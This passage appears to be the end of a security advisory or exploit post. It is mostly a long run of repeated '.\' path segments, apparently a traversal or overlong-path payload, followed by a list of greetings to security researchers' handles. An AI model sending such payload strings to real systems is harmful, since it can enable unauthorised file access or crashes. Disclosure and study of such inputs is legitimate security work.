.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\<br /><br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>